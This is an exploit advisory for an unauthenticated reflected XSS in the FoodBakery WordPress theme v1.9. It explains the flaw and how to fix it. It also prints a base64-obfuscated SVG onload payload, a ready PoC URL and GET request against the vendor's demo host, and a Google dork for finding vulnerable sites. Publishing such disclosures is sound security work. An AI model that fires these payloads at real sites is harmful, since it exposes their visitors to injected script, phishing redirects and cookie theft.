[+] Exploit Title: FoodBakery | Food Delivery Restaurant Directory WordPress Theme v1.9 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/foodbakery/
[+] Date: 2020-07-24
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Chimp Studio [ https://chimpgroup.com ]
[+] Software Version: 1.9
[+] Software Link: https://themeforest.net/item/food-bakery-restaurant-bakery-responsive-wordpress-theme/18970331
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An unauthenticated reflected XSS vulnerability was discovered in the FoodBakery theme through 1.9 for WordPress.
[i] The `location` GET parameter of the listings search page (`/listings/`) is echoed into the response without escaping. The payload below uses `">` to close the enclosing attribute and tag, then injects an `<svg>` element whose `onload` handler runs in the site's origin, so a crafted link is enough to execute script in the browser of any visitor who opens it. No authentication is required.
[i] Caveat: `document.cookie` only yields cookies that are not HttpOnly; WordPress sets its auth cookies HttpOnly by default, so the impact is script execution in the site's origin (CSRF-token theft, DOM manipulation, phishing/redirects) rather than direct session theft.
[i] Remediation is the standard WordPress one: escape the value before output with `esc_attr()` in attribute context (or `esc_html()` in text context).



### [ Payload: ]

[$] "><svg/onload=eval(atob(`amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7`))>

[i] The atob() argument decodes to: javascript:alert(`VLAD VECTOR`);alert(document.cookie);window.location='https://vladvector.ru/';
[i] Inside eval() the leading `javascript:` is parsed as a label, so the three statements run: two alerts, then a redirect to the author's site.



### [ PoC: ]

[!] http://foodbakery.chimpgroup.com/homev1/listings/?search_title=&location=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&foodbakery_locations_position=filter&search_type=custom

[!] GET /homev1/listings/?search_title=&location=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&foodbakery_locations_position=filter&search_type=custom HTTP/1.1
Host: foodbakery.chimpgroup.com



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector